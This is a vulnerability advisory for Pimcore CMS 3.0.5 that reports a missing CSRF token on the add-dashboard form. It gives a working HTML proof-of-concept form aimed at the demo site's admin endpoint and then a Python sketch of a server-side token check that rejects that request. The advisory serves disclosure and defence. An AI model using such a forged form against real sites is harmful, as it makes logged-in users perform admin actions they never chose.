# Affected software: Pimcore CMS
# Type of vulnerability: CSRF
# URL:pimcore.org
# Discovered by: provensec
# Website: provensec.com
# Version: 3.0.5 (Build: 3468)
# Proof of concept
The add dashboard form has no CSRF token:
<html>
<body>
<form
action="http://demo.pimcore.org/admin/portal/create-dashboard">
<input type="hidden" name="_dc" value="1428652489594" />
<input type="hidden" name="key" value="test" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
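
A server-side check that would refuse the request above, given as an added example and not taken from Pimcore's code or from the advisory. It is framework-neutral Python; the `csrf_token` parameter name, the secret and the session ids are assumptions made for the sketch, and only the path and the `_dc`/`key` parameters come from the proof of concept.

```python
import hashlib
import hmac
import secrets

# Assumptions for this sketch: the secret, the session ids and the "csrf_token"
# parameter name are constructed here; only the path and the _dc/key parameters
# come from the proof of concept.
SERVER_SECRET = secrets.token_bytes(32)
PROTECTED_PATHS = {"/admin/portal/create-dashboard"}


def issue_token(session_id: str) -> str:
    """Token bound to one session: HMAC-SHA256(server secret, session id)."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def check_request(method: str, path: str, params: dict, session_id: str) -> tuple:
    """Return (allowed, reason) for a request carrying a valid session cookie."""
    if path not in PROTECTED_PATHS:
        return True, "not a state-changing endpoint"
    if method.upper() != "POST":
        # A form without method= is sent as GET; state changes must not accept it.
        return False, "state change requested with " + method.upper()
    supplied = str(params.get("csrf_token", ""))
    if not supplied:
        return False, "missing csrf_token"
    expected = issue_token(session_id)
    # Compare as bytes in constant time; str arguments would raise on non-ASCII input.
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return False, "csrf_token does not match session"
    return True, "ok"


def demo() -> list:
    """Run the PoC-shaped request and three variants through the check."""
    path = "/admin/portal/create-dashboard"
    poc = {"_dc": "1428652489594", "key": "test"}  # parameters from the PoC form
    other = dict(poc, csrf_token=issue_token("session-B"))  # token of another session
    valid = dict(poc, csrf_token=issue_token("session-A"))  # token of this session
    cases = [("GET", poc), ("POST", poc), ("POST", other), ("POST", valid)]
    return [check_request(m, path, p, "session-A") for m, p in cases]


if __name__ == "__main__":
    for allowed, reason in demo():
        print("ALLOW" if allowed else "DENY ", reason)
```

Only the last case, a POST carrying the token issued for the same session, is allowed; the request shaped like the proof of concept is denied on method alone and would still be denied as a POST because it has no token.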